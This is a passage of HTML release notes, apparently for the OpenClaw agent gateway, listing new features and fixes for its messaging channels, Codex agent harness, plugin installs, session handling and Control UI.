<li>Discord/channels: add reusable message-channel access groups plus Discord channel-audience DM authorization, so allowlists can reference <code>accessGroup:&lt;name&gt;</code> across channel auth paths. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366657956" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75813" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75813/hovercard" href="https://github.com/openclaw/openclaw/pull/75813">#75813</a>)</li>
<li>Crabbox/scripts: print the selected Crabbox binary, version, and supported providers before <code>pnpm crabbox:*</code> commands, and reject stale binaries that lack <code>blacksmith-testbox</code> provider support.</li>
<li>Agents/Codex: add committed happy-path prompt snapshots for Codex/message-tool Telegram direct, Discord group, and heartbeat turns so prompt drift can be reviewed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Agents/workspace: add <code>agents.defaults.skipOptionalBootstrapFiles</code> for skipping selected optional workspace files during bootstrap without disabling required workspace setup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4213876746" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62110" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62110/hovercard" href="https://github.com/openclaw/openclaw/pull/62110">#62110</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mainstay22/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mainstay22">@mainstay22</a>.</li>
<li>Plugins/CLI: add first-class <code>git:</code> plugin installs with ref checkout, commit metadata, normal scanner/staging, and <code>plugins update</code> support for recorded git sources. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/badlogic/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/badlogic">@badlogic</a>.</li>
<li>Google Meet: add live caption health for Chrome transcribe mode, including caption observer state, transcript counters, last caption text, and recent transcript lines in status and doctor output. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</li>
<li>Voice Call/Google Meet: add Twilio Meet join phase logs around pre-connect DTMF, realtime stream setup, and initial greeting handoff for easier live-call debugging. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</li>
<li>macOS app: move recent session context rows into a Context submenu while keeping usage and cost details root-level, so the menu bar companion stays compact with many active sessions. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Guti/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Guti">@Guti</a>.</li>
<li>Gateway/SDK: add SDK-facing tools.invoke RPC with shared HTTP policy, typed approval/refusal results, and SDK helper support. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354626015" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74705" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74705/hovercard" href="https://github.com/openclaw/openclaw/issues/74705">#74705</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ai-hpc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ai-hpc">@ai-hpc</a>.</li>
<li>Discord: keep active buttons, selects, and forms working across Gateway restarts until they expire, so multi-step Discord interactions are less likely to break during upgrades or restarts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Messages/docs: clarify that <code>BodyForAgent</code> is the primary inbound model text while <code>Body</code> is the legacy envelope fallback, and add Signal coverage so channel hardening patches target the real prompt path. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4258357958" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66198" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66198/hovercard" href="https://github.com/openclaw/openclaw/pull/66198">#66198</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/defonota3box/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/defonota3box">@defonota3box</a>.</li>
<li>Slack: publish a safe default App Home tab view on <code>app_home_opened</code>, include the Home tab event in setup manifests, and keep track of bot-participated threads across restarts so ongoing threaded conversations can continue auto-replying after the Gateway restarts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3911903854" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/11655" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/11655/hovercard" href="https://github.com/openclaw/openclaw/issues/11655">#11655</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4114456932" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52020" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52020/hovercard" href="https://github.com/openclaw/openclaw/issues/52020">#52020</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TinyTb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TinyTb">@TinyTb</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Control UI/Usage: add UTC quarter-hour token buckets for the Usage Mosaic and reuse them for hour filtering, keeping the legacy session-span fallback for older summaries. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350628281" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74337" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74337/hovercard" href="https://github.com/openclaw/openclaw/pull/74337">#74337</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/konanok/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/konanok">@konanok</a>.</li>
<li>BlueBubbles: add opt-in <code>channels.bluebubbles.replyContextApiFallback</code> that fetches the original message from the BlueBubbles HTTP API when the in-memory reply-context cache misses (multi-instance deployments sharing one BB account, post-restart, after long-lived TTL/LRU eviction). Off by default; channel-level setting propagates to accounts that omit the flag through <code>mergeAccountConfig</code>; routed through the typed <code>BlueBubblesClient</code> so every fetch is SSRF-guarded by the same three-mode policy as every other BB client request; reply-id shape is validated and part-index prefixes (<code>p:0/&lt;guid&gt;</code>) are stripped before the request; concurrent webhooks for the same <code>replyToId</code> coalesce into one fetch and successful responses populate the reply cache for subsequent hits. Also promotes BlueBubbles attachment download failures from verbose to runtime error so silently-dropped inbound images are visible at default log level, and extends <code>sanitizeForLog</code> to redact <code>?password=…</code>/<code>?token=…</code> query params and <code>Authorization:</code> headers before they reach the log sink (CWE-532). (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329493815" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71820" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71820/hovercard" href="https://github.com/openclaw/openclaw/pull/71820">#71820</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coletebou/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coletebou">@coletebou</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zqchris/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zqchris">@zqchris</a>.</li>
<li>CLI/proxy: add <code>openclaw proxy validate</code> so operators can verify effective proxy configuration, proxy reachability, and expected allow/deny destination behavior before deploying proxy-routed OpenClaw commands. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341892839" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73438" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73438/hovercard" href="https://github.com/openclaw/openclaw/pull/73438">#73438</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesse-merhi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesse-merhi">@jesse-merhi</a>.</li>
<li>Agents/Codex: default Codex app-server dynamic tools to native-first, keeping OpenClaw integration tools while leaving file, patch, exec, and process ownership to the Codex harness; default Codex-harness direct source replies to the OpenClaw <code>message</code> tool when visible reply delivery is not explicitly configured, keeping channel-visible output as a deliberate tool call. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361939028" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75308" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75308/hovercard" href="https://github.com/openclaw/openclaw/pull/75308">#75308</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365795107" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75765" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75765/hovercard" href="https://github.com/openclaw/openclaw/pull/75765">#75765</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Heartbeats/agents: add a structured <code>heartbeat_respond</code> tool for tool-capable heartbeat runs so agents can record quiet outcomes or explicit notification text without relying only on <code>HEARTBEAT_OK</code> parsing. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365795107" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75765" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75765/hovercard" href="https://github.com/openclaw/openclaw/pull/75765">#75765</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Gateway/config: allow <code>$include</code> directives to read files from operator-approved <code>OPENCLAW_INCLUDE_ROOTS</code> directories while preserving default config-directory confinement. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ificator/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ificator">@ificator</a>.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Agents/OpenAI: default GPT-5 API-key sessions to the SSE Responses transport unless WebSocket is explicitly selected, restoring replies in fresh Control UI and WebChat beta installs where the auto WebSocket path connected but produced no model events.</li>
<li>Agents/sessions: preserve terminal lifecycle state when final run metadata persists from a stale in-memory snapshot, preventing sessions from staying stuck as running after completed or timed-out turns.</li>
<li>Gateway/CLI/status: make <code>openclaw gateway start</code> repair stale managed service definitions that point at old OpenClaw versions, missing binaries, or temporary installer paths before starting; add concrete service, config, listener-owner, and log collection next steps when gateway probes fail and Bonjour finds no local gateway; avoid repeated plugin tool descriptor config hashing so large runtime configs do not block reply startup and trigger reconnect/timeouts. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4088411746" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49012" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49012/hovercard" href="https://github.com/openclaw/openclaw/issues/49012">#49012</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367851232" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75944" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75944/hovercard" href="https://github.com/openclaw/openclaw/issues/75944">#75944</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Plugins/update/config: stop treating the non-plugin <code>auth</code> command root as a bundled plugin id, keep packaged upgrades and beta external plugin installs on stable runtime aliases and matching prerelease npm specs, detect tracked plugin install records whose package directories disappeared during <code>openclaw update</code>, reinstall them before normal plugin updates, fail the update if install records still point at missing disk payloads, and validate configured web-search providers plus statically suppressed model/provider pairs against the active plugin set at config load. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Codex/app-server: resolve managed binaries from bundled <code>dist</code> chunks and from the <code>@openai/codex</code> package bin when installs do not provide a nearby <code>.bin/codex</code> shim, avoiding false missing-binary startup failures.</li>
<li>Status: show the <code>openai-codex</code> OAuth profile for <code>openai/gpt-*</code> sessions running through the native Codex runtime instead of reporting auth as unknown. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369662899" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76197" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76197/hovercard" href="https://github.com/openclaw/openclaw/pull/76197">#76197</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</li>
<li>Status/update: resolve beta update-channel checks from the installed version when config still says <code>stable</code>, show configured channels in <code>openclaw status</code> and config-only <code>openclaw channels status</code> output even when the Gateway is unreachable, and let <code>status --deep</code> reuse live gateway channel credential state instead of warning on command-path-only token misses. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/externalization: add official npm-first catalogs for externalized channel, provider, and generic plugins; install official external web-search plugins before saving provider config; repair missing configured, selected-search, and env-selected plugin installs from npm by default; keep official install docs, update examples, live Codex checks, diagnostics ClawHub packages, and persisted bundled-plugin relocation on default npm tags; and keep ACPX, Google Chat, and LINE publishable plugin dist trees out of the core package while ClawHub pack files roll out. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/ClawHub/source/registry: use the ClawHub artifact resolver response as the install decision before downloading, keep bare plugin package specs on npm for the launch cutover and reserve ClawHub resolution for explicit <code>clawhub:</code> specs until ClawHub pack readiness is deployed, discover source-only plugins such as Codex from <code>extensions/*</code>, install ClawPack artifacts from the explicit npm-pack <code>.tgz</code> resolver path, persist artifact kind, npm integrity, shasum, and tarball metadata for update/diagnostics flows, fall back to version metadata when the artifact resolver route is missing, keep the Docker ClawHub fixture aligned with npm-pack artifact resolution, explain unavailable explicit ClawHub ClawPack artifact downloads with a temporary npm install hint, and hash manifest/package metadata when validating persisted plugin registries so fast same-size rewrites cannot leave stale plugin metadata trusted. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Control UI: add validated <code>gateway.controlUi.chatMessageMaxWidth</code> instead of patched bundled CSS, ignore malformed persisted cron rows before they enter UI state, guard stale cron render paths, and bound the default Sessions tab query to recent activity and fewer rows while keeping filters editable. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4279800285" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67935" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67935/hovercard" href="https://github.com/openclaw/openclaw/issues/67935">#67935</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4141837644" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55047" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55047/hovercard" href="https://github.com/openclaw/openclaw/issues/55047">#55047</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4134780011" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54439" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54439/hovercard" href="https://github.com/openclaw/openclaw/issues/54439">#54439</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368768078" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76050" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76050/hovercard" href="https://github.com/openclaw/openclaw/issues/76050">#76050</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4136558129" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54550" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54550/hovercard" href="https://github.com/openclaw/openclaw/pull/54550">#54550</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4136644421" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54552" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54552/hovercard" href="https://github.com/openclaw/openclaw/pull/54552">#54552</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368768844" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76051" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76051/hovercard" href="https://github.com/openclaw/openclaw/pull/76051">#76051</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xiew4589-lang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xiew4589-lang">@xiew4589-lang</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Neomail2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Neomail2">@Neomail2</a>.</li>
<li>Gateway/channels: cap startup fanout at four channel/account handoffs and recover from Bonjour ciao self-probe races, reducing Windows startup stalls with many Telegram accounts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364841887" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75687" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75687/hovercard" href="https://github.com/openclaw/openclaw/issues/75687">#75687</a>.</li>
<li>Gateway/sessions: keep <code>sessions.list</code> polling responsive on large session stores by reusing list-safe session cache/indexes and returning a lightweight compaction checkpoint preview instead of heavyweight summaries. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rolandrscheel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rolandrscheel">@rolandrscheel</a>.</li>
<li>Control UI/Gateway: keep long-running dashboard WebSocket sessions alive with protocol pings, keep Stop available after reconnect or reload by recovering session-scoped active-run abort state, contain standalone iOS PWA viewports with safe-area-aware document locking, use high-contrast text selection colors, and show inline feedback when local slash-command dispatch is unavailable or fails unexpectedly. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4321259716" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70991" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70991/hovercard" href="https://github.com/openclaw/openclaw/issues/70991">#70991</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204728608" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60850" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60850/hovercard" href="https://github.com/openclaw/openclaw/issues/60850">#60850</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4115024686" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52105" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52105/hovercard" href="https://github.com/openclaw/openclaw/issues/52105">#52105</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204759217" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60854" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60854/hovercard" href="https://github.com/openclaw/openclaw/pull/60854">#60854</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexandre-leng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexandre-leng">@alexandre-leng</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kvncrw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kvncrw">@kvncrw</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Badschaff/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Badschaff">@Badschaff</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/efe-arv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/efe-arv">@efe-arv</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MooreQiao/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MooreQiao">@MooreQiao</a>.</li>
<li>CLI/update: treat inherited Gateway service markers as origin hints and only block package replacement when the managed Gateway is still live, so self-updates can stop the service and continue safely. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365329462" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75729" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75729/hovercard" href="https://github.com/openclaw/openclaw/pull/75729">#75729</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hxy91819/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hxy91819">@hxy91819</a>.</li>
<li>Agents/failover: exempt run-level timeouts that fire during tool execution from model fallback, timeout-triggered compaction, and generic timeout payload synthesis, avoiding misleading "LLM request timed out" errors after the primary model has already responded. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4115327379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52147" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52147/hovercard" href="https://github.com/openclaw/openclaw/issues/52147">#52147</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367303713" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75873" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75873/hovercard" href="https://github.com/openclaw/openclaw/pull/75873">#75873</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/simonusa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/simonusa">@simonusa</a>.</li>
<li>Docker: copy Bun 1.3.13 from a digest-pinned image and keep CI on the same version. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350919036" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74356" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74356/hovercard" href="https://github.com/openclaw/openclaw/issues/74356">#74356</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fede-kamel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fede-kamel">@fede-kamel</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sallyom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sallyom">@sallyom</a>.</li>
<li>Agents/compaction: keep prior context on consecutive turns against z.ai-style providers (z.ai direct, openrouter z-ai/*, in-house GLM gateways), avoiding accidental Pi state reset after successful turns. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368789014" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76056" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76056/hovercard" href="https://github.com/openclaw/openclaw/pull/76056">#76056</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a>.</li>
<li>Doctor/plugins: run a one-time 2026.5.2 configured-plugin install repair based on <code>meta.lastTouchedVersion</code>, update stale configured plugin manifests that still declare channels without <code>channelConfigs</code>, install actively used downloadable OpenClaw plugins through the configured external source, preserve unmanaged third-party plugin <code>node_modules</code>, and then mark the config touched for the release.</li>
<li>Sessions/transcripts: use one <code>session.writeLock.acquireTimeoutMs</code> policy for session transcript lock acquisitions and raise the default wait to 60 seconds, avoiding user-visible lock timeouts during legitimate slow prep, cleanup, compaction, and mirror work. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367529883" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75894" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75894/hovercard" href="https://github.com/openclaw/openclaw/issues/75894">#75894</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shandutta/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shandutta">@shandutta</a>.</li>
<li>Agents/restart recovery: match cleaned transcript locks by exact transcript lock paths plus the canonical session fallback, so interrupted main sessions using topic-suffixed transcripts resume after gateway restart. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368769053" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76052" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76052/hovercard" href="https://github.com/openclaw/openclaw/pull/76052">#76052</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anyech/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anyech">@anyech</a>.</li>
<li>Agents/runtime: cache the stable system-prompt prefix and reuse prompt-report tool schema stats during dispatch prep, reducing repeated CPU work before streaming starts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368424894" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75999" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75999/hovercard" href="https://github.com/openclaw/openclaw/issues/75999">#75999</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368807955" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76061" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76061/hovercard" href="https://github.com/openclaw/openclaw/issues/76061">#76061</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zackchiutw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zackchiutw">@zackchiutw</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/STLI69/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/STLI69">@STLI69</a>.</li>
